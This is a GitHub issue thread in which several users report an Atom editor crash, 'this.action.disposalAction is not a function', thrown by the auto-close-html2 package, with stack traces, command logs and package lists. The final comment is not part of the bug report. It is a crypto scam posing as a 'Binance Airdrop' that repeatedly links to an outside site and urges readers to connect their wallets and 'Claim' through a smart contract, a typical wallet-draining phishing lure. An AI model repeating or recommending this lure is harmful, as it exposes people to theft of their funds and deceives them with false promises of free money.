### ISSUE TITLE
Uncaught TypeError: this.action.disposalAction is not a function

### ISSUE THREAD

**Issue by iwuji1** [yubaoquan/auto-close-html2#20]
[Enter steps to reproduce:]

1. ...
2. ...

**Atom**: 1.57.0 x64
**Electron**: 9.4.4
**OS**: macOS 11.3.1
**Thrown From**: [auto-close-html2](https://github.com/yubaoquan/auto-close-html2) package 0.7.0

### Stack Trace

Uncaught TypeError: this.action.disposalAction is not a function

```
At /Users/obiwuji/.atom/packages/auto-close-html2/lib/auto-close-html2.js:145

TypeError: this.action.disposalAction is not a function
    at Object._paneItemChanged (/packages/auto-close-html2/lib/auto-close-html2.js:145:25)
    at /packages/auto-close-html2/lib/auto-close-html2.js:105:18
    at Function.simpleDispatch (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:1186190)
    at Emitter.emit (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:1187631)
    at Workspace.didChangeActivePaneItemOnPaneContainer (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:427714)
    at /private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:14:44996
    at Function.simpleDispatch (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:1186190)
    at Emitter.emit (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:1187631)
    at PaneContainer.didChangeActiveItemOnPane (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:450044)
    at Pane.setActiveItem (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:458888)
    at Pane.activateItem (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:461058)
    at TabBarView.onClick (/private/var/folders/jz/z3_f85ds75b5xg311_r4zm0r0000gn/T/AppTranslocation/9F5997F2-895D-42FB-85FF-1BD18102D58A/d/Atom.app/Contents/Resources/app/static/<embedded>:11:1137111)
```

### Commands

```
     -9:01.1.0 editor:newline (input.hidden-input)
     -9:00.5.0 core:paste (input.hidden-input)
     -8:58.9.0 core:save (input.hidden-input)
     -7:01.3.0 core:paste (input.hidden-input)
     -6:59.1.0 core:save (input.hidden-input)
 10x -2:20.5.0 core:backspace (input.hidden-input)
     -2:13.5.0 autocomplete-plus:confirm (input.hidden-input)
  2x -2:11.8.0 core:save (input.hidden-input)
  4x -1:51.5.0 core:backspace (input.hidden-input)
     -1:48.7.0 autocomplete-plus:confirm (input.hidden-input)
     -1:45.6.0 core:save (input.hidden-input)
     -1:15.2.0 tree-view:add-file (span.name.icon.icon-file-text)
     -1:01.2.0 core:confirm (input.hidden-input)
     -0:47.8.0 core:paste (input.hidden-input)
     -0:27.1.0 core:save (input.hidden-input)
```

### Non-Core Packages

```
atom-beautify 0.33.4 
auto-close-html2 0.7.0 
color-picker 2.3.0 
emmet 2.4.3 
pigments 0.40.6 
```

**Comment by JohnPOK** [comment]
Experiencing same issue.

Atom: 1.56.0 x64
OS: OpenSuse Leap 15.2
Thrown From: auto-close-html2/lib/auto-close-html2.js:145

**Comment by ConfusedPiratesSociety** [comment]
Same here.

Atom 1.57.0
Windows 10

TypeError: this.action.disposalAction is not a function
    at Object._paneItemChanged (file:///C:/Users/dev/.atom/packages/auto-close-html2/lib/auto-close-html2.js:145:25)
    and so on.....

**Comment by jayib** [comment]
Also experiencing this exact error.  Every time I try to close a tab or switch tabs, it throws this error.  Makes using the editor impossible.  Removing the auto-close-html2 package cleared the problem.

Atom 1.58.0 x64
Windows 10

**Comment by alexxaxxa** [comment]
Ошибка появилась после закрытия первого проекта, выполненного в Atom (у первого проекта данной проблемы не было, возникла после ребута и открытия нового проекта). Удаление пакета auto-close-html2 (как выше и писали, спасибо) устранило проблему.

Atom 1.58.0 x64
W7

**Comment by nanduu01** [comment]
### Prerequisites

* [ ] Put an X between the brackets on this line if you have done all of the following:
    * Reproduced the problem in Safe Mode: <https://flight-manual.atom.io/hacking-atom/sections/debugging/#using-safe-mode>
    * Followed all applicable steps in the debugging guide: <https://flight-manual.atom.io/hacking-atom/sections/debugging/>
    * Checked the FAQs on the message board for common solutions: <https://discuss.atom.io/c/faq>
    * Checked that your issue isn't already filed: <https://github.com/issues?q=is%3Aissue+user%3Aatom>
    * Checked that there is not already an Atom package that provides the described functionality: <https://atom.io/packages>

### Description



### Steps to Reproduce

1. 
2. 
3. 

**Expected behavior:**



**Actual behavior:**



### Versions

**Atom**: 1.60.0 x64
**Electron**: 9.4.4
**OS**: Microsoft Windows 10 Home Single Language
**Thrown From**: [auto-close-html2](https://github.com/yubaoquan/auto-close-html2) package 0.7.0


### Stack Trace

Uncaught TypeError: this.action.disposalAction is not a function

```
At C:\Users\Vishnu\.atom\packages\auto-close-html2\lib\auto-close-html2.js:145

TypeError: this.action.disposalAction is not a function
    at Object._paneItemChanged (/packages/auto-close-html2/lib/auto-close-html2.js:145:25)
    at /packages/auto-close-html2/lib/auto-close-html2.js:105:18
    at Function.simpleDispatch (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:1187666)
    at Emitter.emit (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:1189107)
    at Workspace.didActivatePaneContainer (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:428098)
    at ~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:473131
    at Function.simpleDispatch (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:1187666)
    at Emitter.emit (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:1189107)
    at PaneContainer.didActivatePane (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:450390)
    at Pane.activate (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:467865)
    at Pane.focus (~/AppData/Local/atom/app-1.60.0/resources/app/static/<embedded>:11:459246)
    at HTMLElement.handleFocus (/app.asar/src/pane-element.js:42:20)
```

### Commands

```
```

### Non-Core Packages

```
atom-beautifier 0.5.0 
atom-beautify 0.33.4 
atom-ternjs 0.20.0 
auto-close-html2 0.7.0 
autoclose-html-plus 0.27.2 
csslint 1.2.0 
emmet 2.4.3 
```

### Additional Information



PLEASE CLEAR THIS ERROR

**Comment by gazrogers** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @
